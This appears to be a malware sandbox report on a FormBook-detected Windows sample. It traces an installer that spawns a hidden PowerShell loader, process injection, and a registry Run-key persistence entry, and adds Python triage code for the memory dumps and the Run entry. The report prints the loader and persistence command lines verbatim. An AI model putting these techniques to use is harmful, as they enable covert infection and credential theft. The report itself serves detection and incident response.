Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F60 NtCreateProcessEx, 8_2_204A2F60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F30 NtCreateSection, 8_2_204A2F30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FE0 NtCreateFile, 8_2_204A2FE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F90 NtProtectVirtualMemory, 8_2_204A2F90
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FA0 NtQuerySection, 8_2_204A2FA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FB0 NtResumeThread, 8_2_204A2FB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A3010 NtOpenDirectoryObject, 8_2_204A3010
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A3090 NtSetValueKey, 8_2_204A3090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A4340 NtSetContextThread,LdrInitializeThunk, 14_2_031A4340
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A4650 NtSuspendThread,LdrInitializeThunk, 14_2_031A4650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2B60 NtClose,LdrInitializeThunk, 14_2_031A2B60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AD0 NtReadFile,LdrInitializeThunk, 14_2_031A2AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AF0 NtWriteFile,LdrInitializeThunk, 14_2_031A2AF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F30 NtCreateSection,LdrInitializeThunk, 14_2_031A2F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FB0 NtResumeThread,LdrInitializeThunk, 14_2_031A2FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FE0 NtCreateFile,LdrInitializeThunk, 14_2_031A2FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2EE0 NtQueueApcThread,LdrInitializeThunk, 14_2_031A2EE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D10 NtMapViewOfSection,LdrInitializeThunk, 14_2_031A2D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_031A2D30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DD0 NtDelayExecution,LdrInitializeThunk, 14_2_031A2DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_031A2DF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_031A2C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C60 NtCreateKey,LdrInitializeThunk, 14_2_031A2C60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CA0 NtQueryInformationToken,LdrInitializeThunk, 14_2_031A2CA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A35C0 NtCreateMutant,LdrInitializeThunk, 14_2_031A35C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A39B0 NtGetContextThread,LdrInitializeThunk, 14_2_031A39B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2B80 NtQueryInformationFile, 14_2_031A2B80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BA0 NtEnumerateValueKey, 14_2_031A2BA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BF0 NtAllocateVirtualMemory, 14_2_031A2BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BE0 NtQueryValueKey, 14_2_031A2BE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AB0 NtWaitForSingleObject, 14_2_031A2AB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F60 NtCreateProcessEx, 14_2_031A2F60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F90 NtProtectVirtualMemory, 14_2_031A2F90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FA0 NtQuerySection, 14_2_031A2FA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2E30 NtWriteVirtualMemory, 14_2_031A2E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2E80 NtReadVirtualMemory, 14_2_031A2E80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2EA0 NtAdjustPrivilegesToken, 14_2_031A2EA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D00 NtSetInformationFile, 14_2_031A2D00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DB0 NtEnumerateKey, 14_2_031A2DB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C00 NtQueryInformationProcess, 14_2_031A2C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CC0 NtQueryVirtualMemory, 14_2_031A2CC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CF0 NtOpenProcess, 14_2_031A2CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3010 NtOpenDirectoryObject, 14_2_031A3010
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3090 NtSetValueKey, 14_2_031A3090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3D10 NtOpenProcessToken, 14_2_031A3D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3D70 NtOpenThread, 14_2_031A3D70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7730 NtCreateFile, 14_2_003E7730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7890 NtReadFile, 14_2_003E7890
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7970 NtDeleteFile, 14_2_003E7970
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7A10 NtClose, 14_2_003E7A10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Windows\SysWOW64\psiloses.lnk Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll 10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031EF290 appears 105 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0315B970 appears 283 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031A5130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031DEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031B7E54 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204B7E54 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204A5130 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204DEA12 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204EF290 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 2045B970 appears 111 times
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
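The Yara hits above are reported against memory-dump identifiers rather than files. The following is an added example (not part of the sandbox report) that decodes those identifiers so the dumps can be ordered for manual review: the field layout, <process index>.<phase>.<dump id>.<base>.<protection>.<flags>.<memory type>.<n>.sdmp, is inferred from the identifiers on this page and is an assumption; the protection and memory-type fields are read with the Win32 PAGE_* and MEM_* constants, which is consistent with every identifier here (image regions carry 0x20 / 0x01000000, heap-like regions 0x04 / 0x00020000). The process-index table is read off the "<image>, <identifier>" pairs in this report.

```python
"""Decode Joe Sandbox style *.sdmp identifiers and rank Yara-matched dumps."""
import re

PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Process index -> image, taken from the "<image>, <identifier>" pairs in this report.
PROCESS_INDEX = {0x2: "powershell.exe", 0x8: "Overfondle.exe",
                 0xD: "rmGjiHyfWQcajCGtrYkAoHJJOdK.exe", 0xE: "cmd.exe",
                 0xF: "rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"}

# Assumed layout (see lead-in): proc.phase.dump.base.prot.flags.type.n.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<n>[0-9A-Fa-f]{8})\.sdmp")


def parse_sdmp(name):
    """Return a dict describing one dump identifier, or None if it does not match."""
    m = SDMP_RE.search(name)
    if not m:
        return None
    prot = int(m["prot"], 16)
    mtype = int(m["mtype"], 16)
    proc = int(m["proc"], 16)
    return {
        "process_index": proc,
        "image": PROCESS_INDEX.get(proc, "?"),
        "phase": int(m["phase"], 16),
        "base": int(m["base"], 16),
        "protection": PAGE.get(prot, hex(prot)),
        "memory_type": MEM.get(mtype, hex(mtype)),
        "executable": bool(prot & 0x60),   # PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE
        "writable": bool(prot & 0x44),     # PAGE_READWRITE | PAGE_EXECUTE_READWRITE
    }


def prioritise(names):
    """Order matched dumps for review: executable regions that are not a loaded
    image (unpacked code) first, then writable data (config, strings)."""
    parsed = [p for p in (parse_sdmp(n) for n in names) if p]

    def key(p):
        unpacked_code = p["executable"] and p["memory_type"] != "MEM_IMAGE"
        return (0 if unpacked_code else 1, 0 if p["writable"] else 1, p["image"], p["base"])

    return sorted(parsed, key=key)


# Constructed input: the FormBook Yara hits listed on this page.
YARA_HITS = [
    "0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp",
    "0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp",
    "0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp",
    "00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp",
    "0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp",
    "00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp",
    "0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp",
]

if __name__ == "__main__":
    for p in prioritise(YARA_HITS):
        print(f'{p["image"]:<32} base=0x{p["base"]:08x} {p["protection"]:<24} {p["memory_type"]}')
```

Five of the seven hits are RWX regions of mapped (not image-backed) memory in Overfondle.exe, cmd.exe and the Program Files (x86) copy, which fits the "Maps a DLL or memory area into another process" signature: the unpacked FormBook code lives in sections mapped across processes, and those dumps are the ones to pull for configuration extraction; the two PAGE_READWRITE private regions in cmd.exe are where the decrypted strings sit.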
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/13@4/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404766
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00402173 CoCreateInstance,MultiByteToWideChar, 0_2_00402173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Users\user\AppData\Local\Temp\nsnA2B.tmp
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cmd.exe, 0000000E.00000002.2614682827.0000000000962000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2350094315.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2349933593.0000000000937000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000985000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Virustotal: Detection: 57%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
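The process chain ends with reg.exe writing a REG_EXPAND_SZ Run value whose "executable" is an environment variable (%elaf%) and whose argument pulls the next stage out of a second registry value (HKCU:\noncoherent\Skvadredes) and hands it back to the interpreter, so nothing of the persistence stage is a file on disk. The following is an added example, not part of the sandbox report or of the sample, that parses that command line into its parts and lists what to export before the host is cleaned. The command line is copied from this page; the whitelist of environment variables a benign Run entry may expand, the severity labels and the assumption that the variable is defined under HKCU\Environment are the author's.

```python
"""Triage of a `REG ADD ...\\CurrentVersion\\Run` persistence command line."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Constructed input: reg.exe command line as recorded in the process chain above.
SAMPLE_CMDLINE = (
    'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "Hakkebrttet" '
    '/t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized '
    "$Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\\noncoherent\\').Skvadredes;"
    '%elaf% ($Ultramicrotome)"'
)

# Variables a legitimate REG_EXPAND_SZ Run entry normally expands (assumption; tune per estate).
KNOWN_ENV = {"systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
             "programdata", "appdata", "localappdata", "userprofile", "temp", "tmp",
             "comspec", "public", "commonprogramfiles", "commonprogramfiles(x86)"}
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")


@dataclass
class RunEntry:
    key: str
    name: str
    reg_type: str
    data: str
    env_vars: Set[str] = field(default_factory=set)
    stash: Optional[Tuple[str, str]] = None   # (registry path, value) holding the next stage
    findings: List[str] = field(default_factory=list)


def _opt(cmd: str, switch: str, greedy: bool = False) -> Optional[str]:
    """Value of /v, /t or /d: a quoted string (greedy for /d, which may contain
    spaces and symbols) or a bare token."""
    quoted = r'"(.*)"' if greedy else r'"([^"]*)"'
    m = re.search(r"/%s\s+(?:%s|(\S+))" % (switch, quoted), cmd, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def triage(cmd: str) -> RunEntry:
    m = re.match(r"\s*REG\s+ADD\s+(\S+)", cmd, re.I)
    if not m:
        raise ValueError("not a REG ADD command line")
    e = RunEntry(key=m.group(1), name=_opt(cmd, "v") or "(Default)",
                 reg_type=(_opt(cmd, "t") or "REG_SZ").upper(),
                 data=_opt(cmd, "d", greedy=True) or "")
    if not e.key.lower().endswith(RUN_KEYS):
        e.findings.append("info: not a Run/RunOnce key")
        return e
    e.env_vars = set(re.findall(r"%([^%\s]+)%", e.data))
    unknown = {v for v in e.env_vars if v.lower() not in KNOWN_ENV}
    if e.reg_type == "REG_EXPAND_SZ" and unknown:
        e.findings.append("high: interpreter path hidden behind non-standard variable(s) %s"
                          % ", ".join(sorted(unknown)))
    if re.search(r"-w(?:indowstyle)?\s+(?:hidden|minimized)", e.data, re.I):
        e.findings.append("medium: window hidden or minimized at start")
    # (Get-ItemProperty -Path '<key>').<value> : the next stage is stored in the registry
    s = re.search(r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", e.data)
    if s:
        e.stash = (s.group(1), s.group(2))
        e.findings.append("high: next stage is read from registry value %s%s and handed "
                          "back to the interpreter as its command (no script on disk)" % e.stash)
    if not re.search(r"\.(?:exe|cmd|bat|vbs|js|ps1|lnk)\b", e.data, re.I):
        e.findings.append("medium: no on-disk executable referenced")
    return e


def artifacts(e: RunEntry) -> List[str]:
    """Registry paths to export before remediation. The variable definition is assumed
    to live under HKCU\\Environment, the only place a user-level process can create it."""
    out = ["%s\\%s" % (e.key, e.name)]
    out += ["HKCU\\Environment\\%s" % v for v in sorted(e.env_vars)]
    if e.stash:
        out.append("%s%s" % e.stash)
    return out


if __name__ == "__main__":
    entry = triage(SAMPLE_CMDLINE)
    for f in entry.findings:
        print(f)
    print("collect:", *artifacts(entry), sep="\n  ")
```

Because the Run value only references %elaf%, a hunt that matches Run entries against known interpreter paths misses it; matching REG_EXPAND_SZ values whose first token is a variable outside the usual set, as above, catches this family regardless of the variable name.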
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: msls31.dll
